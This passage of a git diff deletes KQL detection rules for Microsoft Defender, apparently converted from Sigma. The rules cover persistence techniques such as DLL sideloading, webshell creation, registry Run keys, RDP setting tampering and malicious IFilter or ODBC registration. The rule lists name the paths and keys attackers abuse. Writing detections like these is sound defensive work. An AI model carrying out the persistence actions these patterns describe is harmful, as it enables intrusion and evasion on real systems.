"\\batmeter.dll" or FolderPath endswith "\\bootux.dll" or FolderPath endswith "\\cmutil.dll" or FolderPath endswith "\\configmanager2.dll" or FolderPath endswith "\\coredplus.dll" or FolderPath endswith "\\coreuicomponents.dll" or FolderPath endswith "\\cryptsp.dll" or FolderPath endswith "\\dmcommandlineutils.dll" or FolderPath endswith "\\drvstore.dll" or FolderPath endswith "\\dsprop.dll" or FolderPath endswith "\\dxcore.dll" or FolderPath endswith "\\edgeiso.dll" or FolderPath endswith "\\framedynos.dll" or FolderPath endswith "\\fveskybackup.dll" or FolderPath endswith "\\fvewiz.dll" or FolderPath endswith "\\gpapi.dll" or FolderPath endswith "\\icmp.dll" or FolderPath endswith "\\ifsutil.dll" or FolderPath endswith "\\iumsdk.dll" or FolderPath endswith "\\lockhostingframework.dll" or FolderPath endswith "\\lrwizdll.dll" or FolderPath endswith "\\mbaexmlparser.dll" or FolderPath endswith "\\mfc42u.dll" or FolderPath endswith "\\msiso.dll" or FolderPath endswith "\\msvcp110_win.dll" or FolderPath endswith "\\netapi32.dll" or FolderPath endswith "\\netjoin.dll" or FolderPath endswith "\\netprovfw.dll" or FolderPath endswith "\\opcservices.dll" or FolderPath endswith "\\pkeyhelper.dll" or FolderPath endswith "\\playsndsrv.dll" or FolderPath endswith "\\powrprof.dll" or FolderPath endswith "\\prntvpt.dll" or FolderPath endswith "\\profapi.dll" or FolderPath endswith "\\proximitycommon.dll" or FolderPath endswith "\\proximityservicepal.dll" or FolderPath endswith "\\rasdlg.dll" or FolderPath endswith "\\security.dll" or FolderPath endswith "\\sppcext.dll" or FolderPath endswith "\\srmtrace.dll" or FolderPath endswith "\\tpmcoreprovisioning.dll" or FolderPath endswith "\\umpdc.dll" or FolderPath endswith "\\unattend.dll" or FolderPath endswith "\\urlmon.dll" or FolderPath endswith "\\vdsutil.dll" or FolderPath endswith "\\version.dll" or FolderPath endswith "\\winbio.dll" or FolderPath endswith "\\windows.ui.immersive.dll" or FolderPath endswith "\\winscard.dll" or 
FolderPath endswith "\\winsync.dll" or FolderPath endswith "\\wscapi.dll" or FolderPath endswith "\\wsmsvc.dll" or FolderPath endswith "\\FxsCompose.dll" or FolderPath endswith "\\WfsR.dll" or FolderPath endswith "\\rpchttp.dll" or FolderPath endswith "\\storageusage.dll" or FolderPath endswith "\\amsi.dll" or FolderPath endswith "\\PrintIsolationProxy.dll" or FolderPath endswith "\\msdtcVSp1res.dll" or FolderPath endswith "\\rdpendp.dll" or FolderPath endswith "\\dxilconv.dll" or FolderPath endswith "\\utcutil.dll" or FolderPath endswith "\\appraiser.dll" or FolderPath endswith "\\dsound.dll" or FolderPath endswith "\\DispBroker.dll" or FolderPath endswith "\\FXSRESM.DLL" or FolderPath endswith "\\cryptnet.dll" or FolderPath endswith "\\COMRES.DLL" or FolderPath endswith "\\igdumdim64.dll" or FolderPath endswith "\\igd10iumd64.dll" or FolderPath endswith "\\igd12umd64.dll" or FolderPath endswith "\\igdusc64.dll" or FolderPath endswith "\\WLBSCTRL.dll" or FolderPath endswith "\\TSMSISrv.dll" or FolderPath endswith "\\TSVIPSrv.dll" or FolderPath endswith "\\wow64log.dll" or FolderPath endswith "\\WptsExtensions.dll" or FolderPath endswith "\\wbemcomn.dll") and (not(((FolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\" and FolderPath endswith "\\version.dll") or (FolderPath endswith "\\cscui.dll" and FolderPath startswith "C:\\Windows\\Microsoft.NET\\") or (FolderPath contains "C:\\$WINDOWS.~BT\\" or FolderPath contains "C:\\$WinREAgent\\" or FolderPath contains "C:\\Windows\\SoftwareDistribution\\" or FolderPath contains "C:\\Windows\\System32\\" or FolderPath contains "C:\\Windows\\SystemTemp\\" or FolderPath contains "C:\\Windows\\SysWOW64\\" or FolderPath contains "C:\\Windows\\WinSxS\\")))) and (not(((FolderPath contains "C:\\Program Files\\Arsenal-Image-Mounter-" and (FolderPath endswith "\\mi.dll" or FolderPath endswith "\\miutils.dl")) or FolderPath contains 
"C:\\Packages\\Plugins\\Microsoft.GuestConfiguration.ConfigurationforWindows\\" or ((FolderPath contains "C:\\Program Files\\CheckPoint\\" or FolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and FolderPath endswith "\\PolicyManager.dll" and (InitiatingProcessFolderPath contains "C:\\Program Files\\CheckPoint\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\CheckPoint\\") and InitiatingProcessFolderPath endswith "\\SmartConsole.exe") or (FolderPath contains ":\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" or InitiatingProcessFolderPath contains "C:\\Windows\\System32\\backgroundTaskHost.exe")) or (InitiatingProcessFolderPath contains "C:\\Program Files\\WindowsApps\\DellInc.DellSupportAssistforPCs" and InitiatingProcessFolderPath endswith "\\wldp.dll") or (FolderPath contains "C:\\Program Files\\Microsoft\\Exchange Server\\" and FolderPath endswith "\\mswb7.dll") or (FolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" and InitiatingProcessFolderPath endswith "C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\OfficeClickToRun.exe")))) \ No newline at end of file diff --git a/Persistence/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql b/Persistence/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql deleted file mode 100644 index 224f54fb..00000000 --- a/Persistence/Potential_Wazuh_Security_Platform_DLL_Sideloading.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/03/13
-// Level: medium
-// Description: Detects potential DLL side loading of DLLs that are part of the Wazuh security platform
-// Tags: attack.defense_evasion, attack.persistence, attack.privilege_escalation, attack.t1574.001, attack.t1574.002
-DeviceImageLoadEvents
-| where (FolderPath endswith "\\libwazuhshared.dll" or FolderPath endswith "\\libwinpthread-1.dll") and (not((FolderPath startswith "C:\\Program Files\\" or FolderPath startswith "C:\\Program Files (x86)\\"))) and (not(((FolderPath contains "\\AppData\\Local\\" or FolderPath contains "\\ProgramData\\") and FolderPath endswith "\\mingw64\\bin\\libwinpthread-1.dll")))
\ No newline at end of file
diff --git a/Persistence/Potential_Webshell_Creation_On_Static_Website.kql b/Persistence/Potential_Webshell_Creation_On_Static_Website.kql
deleted file mode 100644
index 77f667ad..00000000
--- a/Persistence/Potential_Webshell_Creation_On_Static_Website.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Beyu Denis, oscd.community, Tim Shelton, Thurein Oo
-// Date: 2019/10/22
-// Level: medium
-// Description: Detects the creation of files with certain extensions on a static web site. This can be indicative of potential uploads of a web shell.
-// Tags: attack.persistence, attack.t1505.003
-DeviceFileEvents
-| where (((FolderPath contains ".ashx" or FolderPath contains ".asp" or FolderPath contains ".ph" or FolderPath contains ".soap") and FolderPath contains "\\inetpub\\wwwroot\\") or (FolderPath contains ".ph" and (FolderPath contains "\\www\\" or FolderPath contains "\\htdocs\\" or FolderPath contains "\\html\\"))) and (not((FolderPath contains "\\xampp" or InitiatingProcessFolderPath =~ "System" or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "\\Windows\\Temp\\"))))
\ No newline at end of file
diff --git a/Persistence/Potentially_Suspicious_ODBC_Driver_Registered.kql b/Persistence/Potentially_Suspicious_ODBC_Driver_Registered.kql
deleted file mode 100644
index 3ba6f4bf..00000000
--- a/Persistence/Potentially_Suspicious_ODBC_Driver_Registered.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/23
-// Level: high
-// Description: Detects the registration of a new ODBC driver where the driver is located in a potentially suspicious location
-// Tags: attack.persistence, attack.t1003
-DeviceRegistryEvents
-| where (RegistryValueData contains ":\\PerfLogs\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Registration\\CRMLog" or RegistryValueData contains ":\\Windows\\System32\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\System32\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\System32\\Microsoft\\Crypto\\RSA\\MachineKeys\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\drivers\\color\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\PRINTERS\\" or RegistryValueData contains ":\\Windows\\System32\\spool\\SERVERS\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks_Migrated\\" or RegistryValueData contains ":\\Windows\\System32\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\com\\dmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\FxsTmp\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\PLA\\System\\" or RegistryValueData contains ":\\Windows\\SysWOW64\\Tasks\\Microsoft\\Windows\\SyncCenter\\" or RegistryValueData contains ":\\Windows\\Tasks\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains ":\\Windows\\Tracing\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\" or RegistryValueData contains "\\AppData\\Roaming\\") and RegistryKey contains "\\SOFTWARE\\ODBC\\ODBCINST.INI" and (RegistryKey endswith "\\Driver" or RegistryKey endswith "\\Setup")
\ No newline at end of file
diff --git a/Persistence/PowerShell_Module_File_Created.kql b/Persistence/PowerShell_Module_File_Created.kql
deleted file mode 100644
index f5d07da1..00000000
--- a/Persistence/PowerShell_Module_File_Created.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/09
-// Level: low
-// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc.
-// Tags: attack.persistence
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\")
\ No newline at end of file
diff --git a/Persistence/PowerShell_Module_File_Created_By_Non-PowerShell_Process.kql b/Persistence/PowerShell_Module_File_Created_By_Non-PowerShell_Process.kql
deleted file mode 100644
index 089c2a85..00000000
--- a/Persistence/PowerShell_Module_File_Created_By_Non-PowerShell_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/09
-// Level: medium
-// Description: Detects the creation of a new PowerShell module ".psm1", ".psd1", ".dll", ".ps1", etc. by a non-PowerShell process
-// Tags: attack.persistence
-DeviceFileEvents
-| where (FolderPath contains "\\WindowsPowerShell\\Modules\\" or FolderPath contains "\\PowerShell\\7\\Modules\\") and (not((InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7-preview\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Program Files\\PowerShell\\7\\pwsh.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\poqexec.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell_ise.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe")))
\ No newline at end of file
diff --git a/Persistence/PowerShell_Profile_Modification.kql b/Persistence/PowerShell_Profile_Modification.kql
deleted file mode 100644
index cfccee4d..00000000
--- a/Persistence/PowerShell_Profile_Modification.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: HieuTT35, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2019/10/24
-// Level: medium
-// Description: Detects the creation or modification of a powershell profile which could indicate suspicious activity as the profile can be used as a mean of persistence
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1546.013
-DeviceFileEvents
-| where FolderPath endswith "\\Microsoft.PowerShell_profile.ps1" or FolderPath endswith "\\PowerShell\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7-preview\\profile.ps1" or FolderPath endswith "\\Program Files\\PowerShell\\7\\profile.ps1" or FolderPath endswith "\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" or FolderPath endswith "\\WindowsPowerShell\\profile.ps1"
\ No newline at end of file
diff --git a/Persistence/PowerShell_Script_Dropped_Via_PowerShell.EXE.kql b/Persistence/PowerShell_Script_Dropped_Via_PowerShell.EXE.kql
deleted file mode 100644
index 0ba4babc..00000000
--- a/Persistence/PowerShell_Script_Dropped_Via_PowerShell.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2023/05/09
-// Level: low
-// Description: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence.
-// Tags: attack.persistence
-DeviceFileEvents
-| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".ps1") and (not(((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath startswith "C:\\Users\\") or FolderPath contains "__PSScriptPolicyTest_" or FolderPath startswith "C:\\Windows\\Temp\\")))
\ No newline at end of file
diff --git a/Persistence/Powerup_Write_Hijack_DLL.kql b/Persistence/Powerup_Write_Hijack_DLL.kql
deleted file mode 100644
index b2cd19b0..00000000
--- a/Persistence/Powerup_Write_Hijack_DLL.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Subhash Popuri (@pbssubhash)
-// Date: 2021/08/21
-// Level: high
-// Description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation.
-In it's default mode, it builds a self deleting .bat file which executes malicious command.
-The detection rule relies on creation of the malicious bat file (debug.bat by default).
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.defense_evasion, attack.t1574.001
-DeviceFileEvents
-| where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".bat"
\ No newline at end of file
diff --git a/Persistence/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Persistence/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql
deleted file mode 100644
index db3f32f1..00000000
--- a/Persistence/Process_Explorer_Driver_Creation_By_Non-Sysinternals_Binary.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2023/05/05
-// Level: high
-// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself.
-Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards.
-
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1068
-DeviceFileEvents
-| where (FolderPath contains "\\PROCEXP" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe")))
\ No newline at end of file
diff --git a/Persistence/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql b/Persistence/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql
deleted file mode 100644
index c6201772..00000000
--- a/Persistence/Process_Monitor_Driver_Creation_By_Non-Sysinternals_Binary.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/05/05
-// Level: medium
-// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself.
-// Tags: attack.persistence, attack.privilege_escalation, attack.t1068
-DeviceFileEvents
-| where (FolderPath contains "\\procmon" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe")))
\ No newline at end of file
diff --git a/Persistence/RDP_Sensitive_Settings_Changed.kql b/Persistence/RDP_Sensitive_Settings_Changed.kql
deleted file mode 100644
index 7dbac35c..00000000
--- a/Persistence/RDP_Sensitive_Settings_Changed.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022/08/06
-// Level: high
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc
-
-// Tags: attack.defense_evasion, attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where ((RegistryValueData in~ ("DWORD (0x00000001)", "DWORD (0x00000002)", "DWORD (0x00000003)", "DWORD (0x00000004)")) and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and RegistryKey endswith "\\Shadow") or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey contains "\\Control\\Terminal Server" or RegistryKey contains "\\Windows NT\\Terminal Services") and (RegistryKey endswith "\\DisableRemoteDesktopAntiAlias" or RegistryKey endswith "\\DisableSecuritySettings" or RegistryKey endswith "\\fAllowUnsolicited" or RegistryKey endswith "\\fAllowUnsolicitedFullControl")) or (RegistryKey contains "\\Control\\Terminal Server\\InitialProgram" or RegistryKey contains "\\Control\\Terminal Server\\WinStations\\RDP-Tcp\\InitialProgram" or RegistryKey contains "\\services\\TermService\\Parameters\\ServiceDll" or RegistryKey contains "\\Windows NT\\Terminal Services\\InitialProgram")
\ No newline at end of file
diff --git a/Persistence/RDP_Sensitive_Settings_Changed_to_Zero.kql b/Persistence/RDP_Sensitive_Settings_Changed_to_Zero.kql
deleted file mode 100644
index a60a95e8..00000000
--- a/Persistence/RDP_Sensitive_Settings_Changed_to_Zero.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali
-// Date: 2022/09/29
-// Level: medium
-// Description: Detects tampering of RDP Terminal Service/Server sensitive settings.
-Such as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections', etc.
-
-// Tags: attack.defense_evasion, attack.persistence, attack.t1112
-DeviceRegistryEvents
-| where RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "\\fDenyTSConnections" or RegistryKey endswith "\\fSingleSessionPerUser" or RegistryKey endswith "\\UserAuthentication")
\ No newline at end of file
diff --git a/Persistence/Register_New_IFiltre_For_Persistence.kql b/Persistence/Register_New_IFiltre_For_Persistence.kql
deleted file mode 100644
index 0a90454d..00000000
--- a/Persistence/Register_New_IFiltre_For_Persistence.kql
+++ /dev/null
@@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/07/21 -// Level: medium -// Description: Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. -You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files. - -// Tags: attack.persistence -DeviceRegistryEvents -| where ((RegistryKey contains "\\SOFTWARE\\Classes\\CLSID" and RegistryKey contains "\\PersistentAddinsRegistered\\{89BCB740-6119-101A-BCB7-00DD010655AF}") or (RegistryKey contains "\\SOFTWARE\\Classes\\." and RegistryKey contains "\\PersistentHandler")) and (not(((RegistryKey contains "\\CLSID\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}" or RegistryKey contains "\\CLSID\\{4887767F-7ADC-4983-B576-88FB643D6F79}" or RegistryKey contains "\\CLSID\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}" or RegistryKey contains "\\CLSID\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}" or RegistryKey contains "\\CLSID\\{098f2470-bae0-11cd-b579-08002b30bfeb}" or RegistryKey contains "\\CLSID\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}" or RegistryKey contains "\\CLSID\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}" or RegistryKey contains "\\CLSID\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}" or RegistryKey contains "\\CLSID\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}" or RegistryKey contains "\\CLSID\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}" or RegistryKey contains "\\CLSID\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}" or RegistryKey contains "\\CLSID\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}" or RegistryKey contains "\\CLSID\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}" or RegistryKey contains "\\CLSID\\{5e941d80-bf96-11cd-b579-08002b30bfeb}" or RegistryKey contains "\\CLSID\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}" or RegistryKey contains "\\CLSID\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}" or RegistryKey contains 
"\\CLSID\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}" or RegistryKey contains "\\CLSID\\{9694E38A-E081-46ac-99A0-8743C909ACB6}" or RegistryKey contains "\\CLSID\\{98de59a0-d175-11cd-a7bd-00006b827d94}" or RegistryKey contains "\\CLSID\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}" or RegistryKey contains "\\CLSID\\{B4132098-7A03-423D-9463-163CB07C151F}" or RegistryKey contains "\\CLSID\\{d044309b-5da6-4633-b085-4ed02522e5a5}" or RegistryKey contains "\\CLSID\\{D169C14A-5148-4322-92C8-754FC9D018D8}" or RegistryKey contains "\\CLSID\\{DD75716E-B42E-4978-BB60-1497B92E30C4}" or RegistryKey contains "\\CLSID\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}" or RegistryKey contains "\\CLSID\\{E772CEB3-E203-4828-ADF1-765713D981B8}" or RegistryKey contains "\\CLSID\\{eec97550-47a9-11cf-b952-00aa0051fe20}" or RegistryKey contains "\\CLSID\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}") or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/Persistence/Registry_Modification_to_Hidden_File_Extension.kql b/Persistence/Registry_Modification_to_Hidden_File_Extension.kql deleted file mode 100644 index 3332821a..00000000 --- a/Persistence/Registry_Modification_to_Hidden_File_Extension.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/22 -// Level: medium -// Description: Hides the file extension through modification of the registry -// Tags: attack.persistence, attack.t1137 -DeviceRegistryEvents -| where (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt") \ No newline at end of file 
diff --git a/Persistence/Registry_Persistence_via_Explorer_Run_Key.kql b/Persistence/Registry_Persistence_via_Explorer_Run_Key.kql
deleted file mode 100644
index 6bb67120..00000000
--- a/Persistence/Registry_Persistence_via_Explorer_Run_Key.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community
-// Date: 2018/07/18
-// Level: high
-// Description: Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder
-// Tags: attack.persistence, attack.t1547.001
-DeviceRegistryEvents
-| where (RegistryValueData contains ":\\$Recycle.bin\\" or RegistryValueData contains ":\\ProgramData\\" or RegistryValueData contains ":\\Temp\\" or RegistryValueData contains ":\\Users\\Default\\" or RegistryValueData contains ":\\Users\\Public\\" or RegistryValueData contains ":\\Windows\\Temp\\" or RegistryValueData contains "\\AppData\\Local\\Temp\\") and RegistryKey endswith "\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run"
\ No newline at end of file
diff --git a/Persistence/Rundll32_Registered_COM_Objects.kql b/Persistence/Rundll32_Registered_COM_Objects.kql
deleted file mode 100644
index 314c9c8a..00000000
--- a/Persistence/Rundll32_Registered_COM_Objects.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: frack113
-// Date: 2022/02/13
-// Level: high
-// Description: load malicious registered COM objects
-// Tags: attack.privilege_escalation, attack.persistence, attack.t1546.015
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "-sta " or ProcessCommandLine contains "-localserver ") and (ProcessCommandLine contains "{" and ProcessCommandLine contains "}")) and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE")
\ No newline at end of file
diff --git a/Persistence/Running_Chrome_VPN_Extensions_via_the_Registry_2_VPN_Extension.kql b/Persistence/Running_Chrome_VPN_Extensions_via_the_Registry_2_VPN_Extension.kql
deleted file mode 100644
index dc47093d..00000000
--- a/Persistence/Running_Chrome_VPN_Extensions_via_the_Registry_2_VPN_Extension.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/28 -// Level: high -// Description: Running Chrome VPN Extensions via the Registry install 2 vpn extension -// Tags: attack.persistence, attack.t1133 -DeviceRegistryEvents -| where (RegistryKey contains "Software\\Wow6432Node\\Google\\Chrome\\Extensions" and RegistryKey endswith "update_url") and (RegistryKey contains "fdcgdnkidjaadafnichfpabhfomcebme" or RegistryKey contains "fcfhplploccackoneaefokcmbjfbkenj" or RegistryKey contains "bihmplhobchoageeokmgbdihknkjbknd" or RegistryKey contains "gkojfkhlekighikafcpjkiklfbnlmeio" or RegistryKey contains "jajilbjjinjmgcibalaakngmkilboobh" or RegistryKey contains "gjknjjomckknofjidppipffbpoekiipm" or RegistryKey contains "nabbmpekekjknlbkgpodfndbodhijjem" or RegistryKey contains "kpiecbcckbofpmkkkdibbllpinceiihk" or RegistryKey contains "nlbejmccbhkncgokjcmghpfloaajcffj" or RegistryKey contains "omghfjlpggmjjaagoclmmobgdodcjboh" or RegistryKey contains "bibjcjfmgapbfoljiojpipaooddpkpai" or RegistryKey contains "mpcaainmfjjigeicjnlkdfajbioopjko" or RegistryKey contains "jljopmgdobloagejpohpldgkiellmfnc" or RegistryKey contains "lochiccbgeohimldjooaakjllnafhaid" or RegistryKey contains "nhnfcgpcbfclhfafjlooihdfghaeinfc" or RegistryKey contains "ookhnhpkphagefgdiemllfajmkdkcaim" or RegistryKey contains "namfblliamklmeodpcelkokjbffgmeoo" or RegistryKey contains "nbcojefnccbanplpoffopkoepjmhgdgh" or RegistryKey contains "majdfhpaihoncoakbjgbdhglocklcgno" or RegistryKey contains "lnfdmdhmfbimhhpaeocncdlhiodoblbd" or RegistryKey contains "eppiocemhmnlbhjplcgkofciiegomcon" or RegistryKey contains "cocfojppfigjeefejbpfmedgjbpchcng" or RegistryKey contains "foiopecknacmiihiocgdjgbjokkpkohc" or RegistryKey contains "hhdobjgopfphlmjbmnpglhfcgppchgje" or RegistryKey contains "jgbaghohigdbgbolncodkdlpenhcmcge" or RegistryKey contains "inligpkjkhbpifecbdjhmdpcfhnlelja" or RegistryKey contains "higioemojdadgdbhbbbkfbebbdlfjbip" or RegistryKey contains 
"hipncndjamdcmphkgngojegjblibadbe" or RegistryKey contains "iolonopooapdagdemdoaihahlfkncfgg" or RegistryKey contains "nhfjkakglbnnpkpldhjmpmmfefifedcj" or RegistryKey contains "jpgljfpmoofbmlieejglhonfofmahini" or RegistryKey contains "fgddmllnllkalaagkghckoinaemmogpe" or RegistryKey contains "ejkaocphofnobjdedneohbbiilggdlbi" or RegistryKey contains "keodbianoliadkoelloecbhllnpiocoi" or RegistryKey contains "hoapmlpnmpaehilehggglehfdlnoegck" or RegistryKey contains "poeojclicodamonabcabmapamjkkmnnk" or RegistryKey contains "dfkdflfgjdajbhocmfjolpjbebdkcjog" or RegistryKey contains "kcdahmgmaagjhocpipbodaokikjkampi" or RegistryKey contains "klnkiajpmpkkkgpgbogmcgfjhdoljacg" or RegistryKey contains "lneaocagcijjdpkcabeanfpdbmapcjjg" or RegistryKey contains "pgfpignfckbloagkfnamnolkeaecfgfh" or RegistryKey contains "jplnlifepflhkbkgonidnobkakhmpnmh" or RegistryKey contains "jliodmnojccaloajphkingdnpljdhdok" or RegistryKey contains "hnmpcagpplmpfojmgmnngilcnanddlhb" or RegistryKey contains "ffbkglfijbcbgblgflchnbphjdllaogb" or RegistryKey contains "kcndmbbelllkmioekdagahekgimemejo" or RegistryKey contains "jdgilggpfmjpbodmhndmhojklgfdlhob" or RegistryKey contains "bihhflimonbpcfagfadcnbbdngpopnjb" or RegistryKey contains "ppajinakbfocjfnijggfndbdmjggcmde" or RegistryKey contains "oofgbpoabipfcfjapgnbbjjaenockbdp" or RegistryKey contains "bhnhkdgoefpmekcgnccpnhjfdgicfebm" or RegistryKey contains "knmmpciebaoojcpjjoeonlcjacjopcpf" or RegistryKey contains "dhadilbmmjiooceioladdphemaliiobo" or RegistryKey contains "jedieiamjmoflcknjdjhpieklepfglin" or RegistryKey contains "mhngpdlhojliikfknhfaglpnddniijfh" or RegistryKey contains "omdakjcmkglenbhjadbccaookpfjihpa" or RegistryKey contains "npgimkapccfidfkfoklhpkgmhgfejhbj" or RegistryKey contains "akeehkgglkmpapdnanoochpfmeghfdln" or RegistryKey contains "gbmdmipapolaohpinhblmcnpmmlgfgje" or 